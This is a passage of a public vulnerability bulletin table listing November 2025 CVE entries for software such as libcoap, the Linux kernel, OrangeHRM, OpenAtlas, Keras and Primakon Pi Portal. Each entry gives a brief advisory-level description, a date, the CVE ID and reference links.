| jishenghua JSH_ERP 2.3.1--Paxsizy | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /user/addUser endpoint is vulnerable to fastjson deserialization attacks. | 2025-11-25 | not yet calculated | CVE-2025-51744 | https://gitee.com/jishenghua/JSH_ERP https://gitee.com/jishenghua https://blog.hackpax.top/jsh-erp3/ https://gist.github.com/Paxsizy/cd1557aeba8093a8650601c4dbffb6f9 |
| jishenghua JSH_ERP 2.3.1--Paxsizy | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /role/addcan endpoint is vulnerable to fastjson deserialization attacks. | 2025-11-25 | not yet calculated | CVE-2025-51745 | https://gitee.com/jishenghua/JSH_ERP https://gitee.com/jishenghua https://blog.hackpax.top/jsh-erp4/ https://gist.github.com/Paxsizy/cd1557aeba8093a8650601c4dbffb6f9 |
| jishenghua JSH_ERP 2.3.1--Paxsizy | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /serialNumber/addSerialNumber endpoint is vulnerable to fastjson deserialization attacks. | 2025-11-25 | not yet calculated | CVE-2025-51746 | https://gitee.com/jishenghua/JSH_ERP https://gitee.com/jishenghua https://blog.hackpax.top/jsh-erp5/ https://gist.github.com/Paxsizy/cd1557aeba8093a8650601c4dbffb6f9 |
| jvde-github--AIS-catcher | AIS-catcher is a multi-platform AIS receiver. Prior to version 0.64, a heap buffer overflow vulnerability has been identified in the AIS::Message class of AIS-catcher. This vulnerability allows an attacker to write approximately 1KB of arbitrary data into a 128-byte buffer. This issue has been patched in version 0.64. | 2025-11-29 | not yet calculated | CVE-2025-66216 | https://github.com/jvde-github/AIS-catcher/security/advisories/GHSA-v53x-f5hh-g2g6 https://github.com/jvde-github/AIS-catcher/commit/3de0ef785fc3c96265a71b37df7b0a82cb279312 |
| jvde-github--AIS-catcher | AIS-catcher is a multi-platform AIS receiver. Prior to version 0.64, an integer underflow vulnerability exists in the MQTT parsing logic of AIS-catcher. This vulnerability allows an attacker to trigger a massive Heap Buffer Overflow by sending a malformed MQTT packet with a manipulated Topic Length field. This leads to an immediate Denial of Service (DoS) and, when used as a library, severe Memory Corruption that can be leveraged for Remote Code Execution (RCE). This issue has been patched in version 0.64. | 2025-11-29 | not yet calculated | CVE-2025-66217 | https://github.com/jvde-github/AIS-catcher/security/advisories/GHSA-93mj-c8q3-69rg https://github.com/jvde-github/AIS-catcher/commit/e0f7242eee659909adc11a4c561c3f7011bdefe7 |
| keras-team--keras-team/keras | Keras version 3.11.3 is affected by a path traversal vulnerability in the keras.utils.get_file() function when extracting tar archives. The vulnerability arises because the function uses Python's tarfile.extractall() method without the security-critical filter='data' parameter. Although Keras attempts to filter unsafe paths using filter_safe_paths(), this filtering occurs before extraction, and a PATH_MAX symlink resolution bug triggers during extraction. This bug causes symlink resolution to fail due to path length limits, resulting in a security bypass that allows files to be written outside the intended extraction directory. This can lead to arbitrary file writes outside the cache directory, enabling potential system compromise or malicious code execution. The vulnerability affects Keras installations that process tar archives with get_file() and does not affect versions where this extraction method is secured with the appropriate filter parameter. | 2025-11-28 | not yet calculated | CVE-2025-12638 | https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4 |
| kotaemon 0.11.0--Cinnamon | An issue was discovered in Cinnamon kotaemon 0.11.0. The _may_extract_zip function in the \libs\ktem\ktem\index\file\ui.py file does not check the contents of uploaded ZIP files. Although the contents are extracted into a temporary folder that is cleared before each extraction, successfully uploading a ZIP bomb could still cause the server to consume excessive resources during decompression. Moreover, if no further files are uploaded afterward, the extracted data could occupy disk space and potentially render the system unavailable. Anyone with permission to upload files can carry out this attack. | 2025-11-24 | not yet calculated | CVE-2025-63914 | https://github.com/Cinnamon/kotaemon https://github.com/WxDou/CVE-2025-63914 |
| krpano--krpano | Reflected Cross-Site Scripting (rXSS) in krpano before version 1.23.2 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the victim's browser via a crafted URL to the passQueryParameters function with the xml parameter enabled. | 2025-11-29 | not yet calculated | CVE-2025-65892 | https://krpano.com/docu/releasenotes/?version=1.23.3 https://krpano.com/forum/wbb/index.php?thread/20554-krpano-1-23-3d-gaussian-splatting-support/&postID=96997#post96997 |
| LFDT-Lockness--cggmp21 | CGGMP24 is a state-of-art ECDSA TSS protocol that supports 1-round signing (requires 3 preprocessing rounds), identifiable abort, and a key refresh protocol. Prior to version 0.6.3, there is a missing check in the ZK proof that enables an attack in which single malicious signer can reconstruct full private key. This issue has been patched in version 0.6.3, for full mitigation it is recommended to upgrade to cggmp24 version 0.7.0-alpha.2 as it contains more security checks. | 2025-11-25 | not yet calculated | CVE-2025-66016 | https://github.com/LFDT-Lockness/cggmp21/security/advisories/GHSA-m95p-425x-x889 https://www.dfns.co/article/cggmp21-vulnerabilities-patched-and-explained |
| LFDT-Lockness--cggmp21 | CGGMP24 is a state-of-art ECDSA TSS protocol that supports 1-round signing (requires 3 preprocessing rounds), identifiable abort, and a key refresh protocol. In versions 0.6.3 and prior of cggmp21 and version 0.7.0-alpha.1 of cggmp24, presignatures can be used in the way that significantly reduces security. cggmp24 version 0.7.0-alpha.2 release contains API changes that make it impossible to use presignatures in contexts in which it reduces security. | 2025-11-25 | not yet calculated | CVE-2025-66017 | https://github.com/LFDT-Lockness/cggmp21/security/advisories/GHSA-8frv-q972-9rq5 https://www.dfns.co/article/cggmp21-vulnerabilities-patched-and-explained |
| libcoap--OISM | NULL pointer dereference in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS/TLS connection that triggers BIO_get_data() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65493 | https://github.com/obgm/libcoap/issues/1743 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | NULL pointer dereference in get_san_or_cn_from_cert() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted X.509 certificate that causes sk_GENERAL_NAME_value() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65494 | https://github.com/obgm/libcoap/issues/1745 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | Integer signedness error in tls_verify_call_back() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted TLS certificate that causes i2d_X509() to return -1 and be misused as a malloc() size parameter. | 2025-11-24 | not yet calculated | CVE-2025-65495 | https://github.com/obgm/libcoap/issues/1744 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | NULL pointer dereference in coap_dtls_generate_cookie() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_SSL_CTX() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65496 | https://github.com/obgm/libcoap/issues/1745 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | NULL pointer dereference in coap_dtls_generate_cookie() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_SSL_CTX() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65497 | https://github.com/obgm/libcoap/issues/1745 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | NULL pointer dereference in coap_dtls_generate_cookie() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_SSL_CTX() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65498 | https://github.com/obgm/libcoap/issues/1746 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | Array index error in tls_verify_call_back() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_ex_data_X509_STORE_CTX_idx() to return -1. | 2025-11-24 | not yet calculated | CVE-2025-65499 | https://github.com/obgm/libcoap/issues/1747 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | NULL pointer dereference in coap_dtls_generate_cookie() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_SSL_CTX() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65500 | https://github.com/obgm/libcoap/issues/1746 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | Null pointer dereference in coap_dtls_info_callback() in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a DTLS handshake where SSL_get_app_data() returns NULL. | 2025-11-24 | not yet calculated | CVE-2025-65501 | https://github.com/obgm/libcoap/issues/1748 https://github.com/obgm/libcoap/pull/1750 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: fix refcount leak in nfsd_set_fh_dentry() nfsd exports a "pseudo root filesystem" which is used by NFSv4 to find the various exported filesystems using LOOKUP requests from a known root filehandle. NFSv3 uses the MOUNT protocol to find those exported filesystems and so is not given access to the pseudo root filesystem. If a v3 (or v2) client uses a filehandle from that filesystem, nfsd_set_fh_dentry() will report an error, but still stores the export in "struct svc_fh" even though it also drops the reference (exp_put()). This means that when fh_put() is called an extra reference will be dropped which can lead to use-after-free and possible denial of service. Normal NFS usage will not provide a pseudo-root filehandle to a v3 client. This bug can only be triggered by the client synthesising an incorrect filehandle. To fix this we move the assignments to the svc_fh later, after all possible error cases have been detected. | 2025-11-24 | not yet calculated | CVE-2025-40212 | https://git.kernel.org/stable/c/b6bc86ce3944b10b9fc181fc00c1a520a20ed965 https://git.kernel.org/stable/c/c83d7365cec5eb5ebeeee2a72e29b4ca58a7e4c2 https://git.kernel.org/stable/c/8a7348a9ed70bda1c1f51d3f1815bcbdf9f3b38c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: MGMT: fix crash in set_mesh_sync and set_mesh_complete There is a BUG: KASAN: stack-out-of-bounds in set_mesh_sync due to memcpy from badly declared on-stack flexible array. Another crash is in set_mesh_complete() due to double list_del via mgmt_pending_valid + mgmt_pending_remove. Use DEFINE_FLEX to declare the flexible array right, and don't memcpy outside bounds. As mgmt_pending_valid removes the cmd from list, use mgmt_pending_free, and also report status on error. | 2025-11-24 | not yet calculated | CVE-2025-40213 | https://git.kernel.org/stable/c/5c19daa93d9af29f1f46251b47e1ea66bcc8d679 https://git.kernel.org/stable/c/1c9aca1787e8395a2c59fef20e914467958969c5 https://git.kernel.org/stable/c/e8785404de06a69d89dcdd1e9a0b6ea42dc6d327 |
| Logpoint--SIEM | An issue was discovered in Logpoint before 7.7.0. An improperly configured access control policy exposes sensitive Logpoint internal service (Redis) information to li-admin users. This can lead to privilege escalation. | 2025-11-27 | not yet calculated | CVE-2025-66360 | https://servicedesk.logpoint.com/hc/en-us/articles/29160917867549-Redis-communication-exposed-for-internal-communication |
| Logpoint--SIEM | An issue was discovered in Logpoint before 7.7.0. Sensitive information is exposed in System Processes for an extended period during high CPU load. | 2025-11-27 | not yet calculated | CVE-2025-66361 | https://servicedesk.logpoint.com/hc/en-us/articles/29160993806749-Process-Data-Exposure-Under-High-Load |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.6, an information disclosure vulnerability exposes participant details, including names and email addresses through the /api/trpc/polls.get,polls.participants.list endpoint, even when Pro privacy features are enabled. This bypasses intended privacy controls that should prevent participants from viewing other users' personal information. This issue has been patched in version 4.5.6. | 2025-11-29 | not yet calculated | CVE-2025-66027 | https://github.com/lukevella/rallly/security/advisories/GHSA-65wg-8xgw-f3fg https://github.com/lukevella/rallly/commit/59738c04f9a8ec25f0af5ce20ad0eab6cf134963 https://github.com/lukevella/rallly/releases/tag/v4.5.6 |
| Lumi Security Camera--Blurams | An issue in Blurams Lumi Security Camera (A31C) v23.1227.472.2926 allows local physical attackers to execute arbitrary code via overriding the bootloader on the SD card. | 2025-11-24 | not yet calculated | CVE-2025-63674 | http://blurams.com http://a31c.com https://vindivlabs.com/research/lumi_part_2/ |
| lunary-ai--lunary-ai/lunary | lunary-ai/lunary version 1.9.34 is vulnerable to an account takeover due to improper authentication in the Google OAuth integration. The application fails to verify the 'aud' (audience) field in the access token issued by Google, which is crucial for ensuring the token is intended for the application. This oversight allows attackers to use tokens issued to malicious applications to gain unauthorized access to user accounts. The issue is resolved in version 1.9.35. | 2025-11-25 | not yet calculated | CVE-2025-9803 | https://huntr.com/bounties/4734f35f-514c-4d10-98fa-3a54514f6af6 https://github.com/lunary-ai/lunary/commit/95a2cc8e012bf5f089edbfa072ba66dcb7e10d91 |
| Magewell Pro Convert--Magewell | A Cross-Site Request Forgery (CSRF) in the /mwapi?method=add-user component of Magewell Pro Convert v1.2.213 allows attackers to arbitrarily create accounts via a crafted GET request. | 2025-11-24 | not yet calculated | CVE-2025-63952 | https://www.magewell.com https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-63952 |
| Magewell Pro Convert--Magewell | A Cross-Site Request Forgery (CSRF) in the /usapi?method=add-user component of Magewell Pro Convert v1.2.213 allows attackers to arbitrarily create accounts via a crafted GET request. | 2025-11-24 | not yet calculated | CVE-2025-63953 | https://www.magewell.com https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-63953 |
| MegaTec Taiwan--ClientMate | The CMService.exe service runs with SYSTEM privileges and contains an unquoted service path. This allows a local attacker with write privileges to the filesystem to insert a malicious executable in the path, leading to privilege escalation. | 2025-11-26 | not yet calculated | CVE-2025-66264 | https://www.megatec.com.tw/software-download/ |
| MegaTec Taiwan--ClientMate | CMService.exe creates the C:\\usr directory and subdirectories with insecure permissions, granting write access to all authenticated users. This allows attackers to replace configuration files (such as snmp.conf) or hijack DLLs to escalate privileges. | 2025-11-26 | not yet calculated | CVE-2025-66265 | https://www.megatec.com.tw/software-download/ |
| MegaTec Taiwan--UPSilon2000V6.0 | The RupsMon.exe service executable in UPSilon 2000 has insecure permissions, allowing the 'Everyone' group Full Control. A local attacker can replace the executable with a malicious binary to execute code with SYSTEM privileges or simply change the config path of the service to a command; starting and stopping the service to immediately achieve code execution and privilege escalation | 2025-11-26 | not yet calculated | CVE-2025-66266 | https://www.megatec.com.tw/software-download/ |
| MegaTec Taiwan--UPSilon2000V6.0 | The RupsMon and USBMate services in UPSilon 2000 run with SYSTEM privileges and contain unquoted service paths. This allows a local attacker to perform path interception and escalate privileges if they have write permissions to the directories proceeding that of which the real service executables live in | 2025-11-26 | not yet calculated | CVE-2025-66269 | https://www.megatec.com.tw/software-download/ |
| Millensys Vision Tools Workspace--MILLENSYS | MILLENSYS Vision Tools Workspace 6.5.0.2585 exposes a sensitive configuration endpoint (/MILLENSYS/settings) that is accessible without authentication. This page leaks plaintext database credentials, file share paths, internal license server configuration, and software update parameters. An unauthenticated attacker can retrieve this information by accessing the endpoint directly, potentially leading to full system compromise. The vulnerability is due to missing access controls on a privileged administrative function. | 2025-11-24 | not yet calculated | CVE-2025-63958 | https://www.millensys.com/ https://ozex.gitlab.io/tricks_hacks/2025-11-19-cve-2025-63958/index.html |
| Mongoose--Cesenta | Null pointer dereference in add_ca_certs() in Cesanta Mongoose before 7.2 allows remote attackers to cause a denial of service via TLS initialization where SSL_CTX_get_cert_store() returns NULL. | 2025-11-24 | not yet calculated | CVE-2025-65502 | https://github.com/cesanta/mongoose/issues/3306 https://github.com/cesanta/mongoose/pull/3307 |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. Prior to version 0.22.5, a Heap-Use-After-Free (UAF) vulnerability exists in the TCP transport component of NanoMQ, which relies on the underlying NanoNNG library (specifically in src/sp/transport/mqtt/broker_tcp.c). The vulnerability is due to improper resource management and premature cleanup of message and pipe structures under specific malformed MQTTV5 retain message traffic conditions. This issue has been patched in version 0.22.5. | 2025-11-25 | not yet calculated | CVE-2025-65953 | https://github.com/nanomq/nanomq/security/advisories/GHSA-r95p-wjm8-2qxr |
| NCP Secure Enterprise-NCP | NCP Secure Enterprise Client 13.18 and NCP Secure Entry Windows Client 13.19 have an Untrusted Search Path vulnerability. | 2025-11-26 | not yet calculated | CVE-2025-26155 | https://pentest.axians.de/viewer.html?file=cve-2025-26155/CVE-axians-eng.pdf https://www.ncp-e.com/ |
| Netskope--Netskope Client | Netskope was notified about a potential gap in its agent (NS Client) on Windows systems. If this gap is successfully exploited, a local, authenticated user with Administrator privileges can improperly load the driver as a generic kernel service. This triggers the flaw, causing a system crash (Blue-Screen-of-Death) and resulting in a Denial of Service (DoS) for the affected machine. | 2025-11-28 | not yet calculated | CVE-2025-11156 | https://www.netskope.com/company/security-compliance-and-assurance/security-advisories-and-disclosures/netskope-security-advisory-nskpsa-2025-005 |
| OneUptime--oneuptime | OneUptime is a solution for monitoring and managing online services. In version 9.0.5598, a low-permission user can create new accounts through a direct API request instead of being restricted to the intended interface. This issue has been patched in version 9.1.0. | 2025-11-26 | not yet calculated | CVE-2025-65966 | https://github.com/OneUptime/oneuptime/security/advisories/GHSA-m449-vh5f-574g |
| OneUptime--oneuptime | OneUptime is a solution for monitoring and managing online services. Prior to version 8.0.5567, OneUptime is vulnerable to privilege escalation via Login Response Manipulation. During the login process, the server response included a parameter called isMasterAdmin. By intercepting and modifying this parameter value from false to true, it is possible to gain access to the admin dashboard interface. However, an attacker may be unable to view or interact with the data if they still do not have sufficient permissions. This issue has been patched in version 8.0.5567. | 2025-11-26 | not yet calculated | CVE-2025-66028 | https://github.com/OneUptime/oneuptime/security/advisories/GHSA-675q-66gf-gqg8 https://github.com/OneUptime/oneuptime/commit/3e72b2a9a4f50f98cf1f6cf13fa3e405715bb370 |
| Online Shopping Portal--PHPGurukul | Insecure Direct Object Reference (IDOR) in the Track order function in PHPGURUKUL Online Shopping Portal 2.1 allows information disclosure via the oid parameter. | 2025-11-25 | not yet calculated | CVE-2025-65647 | https://phpgurukul.com/ https://github.com/SachuuZ/CVE/tree/main/CVE-2025-65647 |
| Open-Source HashTech-HashTech Project | An unauthenticated administrative access vulnerability exists in the open-source HashTech project (https://github.com/henzljw/hashtech) 1.0 thru commit 5919decaff2681dc250e934814fc3a35f6093ee5 (2021-07-02). Due to missing authentication checks on /admin_index.php, an attacker can directly access the admin dashboard without valid credentials. This allows full administrative control including viewing/modifying user accounts, managing orders, changing payments, and editing product listings. Successful exploitation can lead to information disclosure, data manipulation, and privilege escalation. | 2025-11-26 | not yet calculated | CVE-2025-65276 | https://gist.github.com/whoisrushi/c3bfcd1adf96d80952edbd03d0310836 |
| OpenAtlas v.8.12.0-- Austrian Academy of Science | An issue in Austrian Academy of Sciences (AW) Austrian Archaeological Institute OpenAtlas v.8.12.0 allows a remote attacker to obtain sensitive information via the login error messages | 2025-11-24 | not yet calculated | CVE-2025-56423 | https://www.sec4you-pentest.com/schwachstellen/ https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-user-enumeration/ |
| OpenAtlas--Austrian Arcchaeolgical Institute | Incorrect access control in Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to access sensitive information via sending a crafted GET request to the /display_logo endpoint. | 2025-11-24 | not yet calculated | CVE-2025-60914 | https://www.sec4you-pentest.com/schwachstellen/ https://www.sec4you-pentest.com/schwachstelle/openatlas-unautorisierter-zugriff-display_logo/ |
| OpenAtlas--Austrian Arcchaeolgical Institute | An issue in the size query parameter (/views/file.py) of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute a path traversal via a crafted request. | 2025-11-24 | not yet calculated | CVE-2025-60915 | https://www.sec4you-pentest.com/schwachstellen/ https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-lfi-konfigurationsdatei-exfiltration/ |
| OpenAtlas--Austrian Arcchaeolgical Institute | A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the charge parameter. | 2025-11-24 | not yet calculated | CVE-2025-60916 | https://www.sec4you-pentest.com/schwachstellen/ https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-reflected-dom-based-xss-charge/ |
| OpenAtlas--Austrian Arcchaeolgical Institute | A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the color parameter. | 2025-11-24 | not yet calculated | CVE-2025-60917 | https://www.sec4you-pentest.com/schwachstellen/ https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-xss-in-farb-feldern-ort/ |
| openbao--openbao | OpenBao is an open source identity-based secrets management system. Prior to version 2.4.4, a privileged operator could use the identity group subsystem to add a root policy to a group identity group, escalating their or another user's permissions in the system. Specifically this is an issue when: an operator in the root namespace has access to identity/groups endpoints and an operator does not have policy access. Otherwise, an operator with policy access could create or modify an existing policy to grant root-equivalent permissions through the sudo capability. This issue has been patched in version 2.4.4. | 2025-11-25 | not yet calculated | CVE-2025-64761 | https://github.com/openbao/openbao/security/advisories/GHSA-7ff4-jw48-3436 https://github.com/openbao/openbao/pull/2143 https://github.com/openbao/openbao/commit/16bb0ccd37a502930a289d434cbe4e7b4edd66e5 |
| openobserve--openobserve | OpenObserve is a cloud-native observability platform. Prior to version 0.16.0, organization invitation tokens do not expire once issued, remain valid even after the invited user is removed from the organization, and allow multiple invitations to the same email with different roles where all issued links remain valid simultaneously. This results in broken access control where a removed or demoted user can regain access or escalate privileges. This issue has been patched in version 0.16.0. | 2025-11-29 | not yet calculated | CVE-2025-66223 | https://github.com/openobserve/openobserve/security/advisories/GHSA-c856-2xpx-gw75 |
| OpenSearch--OpenSearch | A vulnerability in OpenSearch allows attackers to cause Denial of Service (DoS) by submitting complex query_string inputs. This issue affects all OpenSearch versions below 3.2.0. | 2025-11-25 | not yet calculated | CVE-2025-9624 | https://fluidattacks.com/advisories/chick https://opensearch.org/blog/explore-opensearch-3-3/ |
| orangehrm--orangehrm | OrangeHRM is a comprehensive human resource management (HRM) system. From version 5.0 to 5.7, the application contains an input-neutralization flaw in its mail configuration and delivery workflow that allows user-controlled values to flow directly into the system's sendmail command. Because these values are not sanitized or constrained before being incorporated into the command execution path, certain sendmail behaviors can be unintentionally invoked during email processing. This makes it possible for the application to write files on the server as part of the mail-handling routine, and in deployments where those files end up in web-accessible locations, the behavior can be leveraged to achieve execution of attacker-controlled content. The issue stems entirely from constructing OS-level command strings using unsanitized input within the mail-sending logic. This issue has been patched in version 5.8. | 2025-11-29 | not yet calculated | CVE-2025-66224 | https://github.com/orangehrm/orangehrm/security/advisories/GHSA-2w7w-h5wv-xr55 |
| orangehrm--orangehrm | OrangeHRM is a comprehensive human resource management (HRM) system. From version 5.0 to 5.7, the password reset workflow does not enforce that the username submitted in the final reset request matches the account for which the reset process was originally initiated. After obtaining a valid reset link for any account they can receive email for, an attacker can alter the username parameter in the final reset request to target a different user. Because the system accepts the supplied username without verification, the attacker can set a new password for any chosen account, including privileged accounts, resulting in full account takeover. This issue has been patched in version 5.8. | 2025-11-29 | not yet calculated | CVE-2025-66225 | https://github.com/orangehrm/orangehrm/security/advisories/GHSA-5ghw-9775-v263 |
| orangehrm--orangehrm | OrangeHRM is a comprehensive human resource management (HRM) system. From version 5.0 to 5.7, the application does not invalidate existing sessions when a user is disabled or when a password change occurs, allowing active session cookies to remain valid indefinitely. As a result, a disabled user, or an attacker using a compromised account, can continue to access protected pages and perform operations as long as a prior session remains active. Because the server performs no session revocation or session-store cleanup during these critical state changes, disabling an account or updating credentials has no effect on already-established sessions. This makes administrative disable actions ineffective and allows unauthorized users to retain full access even after an account is closed or a password is reset, exposing the system to prolonged unauthorized use and significantly increasing the impact of account takeover scenarios. This issue has been patched in version 5.8. | 2025-11-29 | not yet calculated | CVE-2025-66289 | https://github.com/orangehrm/orangehrm/security/advisories/GHSA-99qp-xh4q-pr9x |
| orangehrm--orangehrm | OrangeHRM is a comprehensive human resource management (HRM) system. From version 5.0 to 5.7, the application's recruitment attachment retrieval endpoint does not enforce the required authorization checks before serving candidate files. Even users restricted to ESS-level access, who have no permission to view the Recruitment module, can directly access candidate attachment URLs. When an authenticated request is made to the attachment endpoint, the system validates the session but does not confirm that the requesting user has the necessary recruitment permissions. As a result, any authenticated user can download CVs and other uploaded documents for arbitrary candidates by issuing direct requests to the attachment endpoint, leading to unauthorized exposure of sensitive applicant data. This issue has been patched in version 5.8. | 2025-11-29 | not yet calculated | CVE-2025-66290 | https://github.com/orangehrm/orangehrm/security/advisories/GHSA-qf8r-c54j-jw88 |
| orangehrm--orangehrm | OrangeHRM is a comprehensive human resource management (HRM) system. From version 5.0 to 5.7, the interview attachment retrieval endpoint in the Recruitment module serves files based solely on an authenticated session and user-supplied identifiers, without verifying whether the requester has permission to access the associated interview record. Because the server does not perform any recruitment-level authorization checks, an ESS-level user with no access to recruitment workflows can directly request interview attachment URLs and receive the corresponding files. This exposes confidential interview documents-including candidate CVs, evaluations, and supporting files-to unauthorized users. The issue arises from relying on predictable object identifiers and session presence rather than validating the user's association with the relevant recruitment process. This issue has been patched in version 5.8. | 2025-11-29 | not yet calculated | CVE-2025-66291 | https://github.com/orangehrm/orangehrm/security/advisories/GHSA-v32g-r8xx-4g6g https://github.com/orangehrm/orangehrm/commit/647133d0fdda989a4836845a6531277078a84607 |
| Otsuka Information Technology--FMS | FMS developed by Otsuka Information Technology has a Reflected Cross-site Scripting vulnerability, allowing unauthenticated remote attackers to execute arbitrary JavaScript codes in user's browser through phishing attacks. | 2025-11-24 | not yet calculated | CVE-2025-13589 | https://www.twcert.org.tw/tw/cp-132-10520-03f29-1.html https://www.twcert.org.tw/en/cp-139-10521-abdc1-2.html |
| Overhang.io--Overhang.io | An issue was discovered in Overhang.IO (tutor-open-edx) (overhangio/tutor) 20.0.2 allowing local unauthorized attackers to gain access to sensitive information due to the absence of proper cache-control HTTP headers and client-side session checks. | 2025-11-26 | not yet calculated | CVE-2025-65681 | https://github.com/overhangio/tutor https://docs.tutor.edly.io https://github.com/Rivek619/CVE-2025-65681 |
| OWASP--java-html-sanitizer | OWASP Java HTML Sanitizer is a configureable HTML Sanitizer written in Java, allowing inclusion of HTML authored by third-parties in web applications while protecting against XSS. In version 20240325.1, OWASP java html sanitizer is vulnerable to XSS if HtmlPolicyBuilder allows noscript and style tags with allowTextIn inside the style tag. This could lead to XSS if the payload is crafted in such a way that it does not sanitise the CSS and allows tags which is not mentioned in HTML policy. At time of publication no known patch is available. | 2025-11-26 | not yet calculated | CVE-2025-66021 | https://github.com/OWASP/java-html-sanitizer/security/advisories/GHSA-g9gq-3pfx-2gw2 |
| pallets--werkzeug | Werkzeug is a comprehensive WSGI web application library. Prior to version 3.1.4, Werkzeug's safe_join function allows path segments with Windows device names. On Windows, there are special device names such as CON, AUX, etc that are implicitly present and readable in every directory. send_from_directory uses safe_join to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely. This issue has been patched in version 3.1.4. | 2025-11-29 | not yet calculated | CVE-2025-66221 | https://github.com/pallets/werkzeug/security/advisories/GHSA-hgf8-39gv-g3f2 https://github.com/pallets/werkzeug/commit/4b833376a45c323a189cd11d2362bcffdb1c0c13 https://github.com/pallets/werkzeug/releases/tag/3.1.4 |
| pretix--pretix | Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. If the name of the attendee contained HTML or Markdown formatting, this was rendered as HTML in the resulting email. This way, a user could inject links or other formatted text through a maliciously formatted name. Since pretix applies a strict allow list approach to allowed HTML tags, this could not be abused for XSS or similarly dangerous attack chains. However, it can be used to manipulate emails in a way that makes user-provided content appear in a trustworthy and credible way, which can be abused for phishing. | 2025-11-27 | not yet calculated | CVE-2025-13742 | https://pretix.eu/about/en/blog/20251126-release-2025-9-1/ |
| Primakon Pi Portal--Primakon | Primakon Pi Portal 1.0.18 /api/v2/users endpoint is vulnerable to unauthorized data exposure due to deficient access control mechanisms. Any authenticated user, regardless of their privilege level (including standard or low-privileged users), can make a GET request to this endpoint and retrieve a complete, unfiltered list of all registered application users. Crucially, the API response body for this endpoint includes password hashes. | 2025-11-25 | not yet calculated | CVE-2025-64061 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64061.md |
| Primakon Pi Portal--Primakon | The Primakon Pi Portal 1.0.18 /api/V2/pp_users?email endpoint is used for user data filtering but lacks proper server-side validation against the authenticated session. By manipulating the email parameter to an arbitrary value (e.g., otheruser@user.com), an attacker can assume the session and gain full access to the target user's data and privileges. Also, if the email parameter is left blank, the application defaults to the first user in the list, who is typically the application administrator, resulting in an immediate Privilege Escalation to the highest level. | 2025-11-25 | not yet calculated | CVE-2025-64062 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64062.md |
| Primakon Pi Portal--Primakon | Primakon Pi Portal 1.0.18 API endpoints fail to enforce sufficient authorization checks when processing requests. Specifically, a standard user can exploit this flaw by sending direct HTTP requests to administrative endpoints, bypassing the UI restrictions. This allows the attacker to manipulate data outside their assigned scope, including: Unauthorized Account modification, modifying/deleting arbitrary user accounts and changing passwords by sending a direct request to the user management API endpoint; Confidential Data Access, accessing and downloading sensitive organizational documents via a direct request to the document retrieval API; Privilege escalation, This vulnerability can lead to complete compromise of data integrity and confidentiality, and Privilege Escalation by manipulating core system functions. | 2025-11-25 | not yet calculated | CVE-2025-64063 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64063.md |
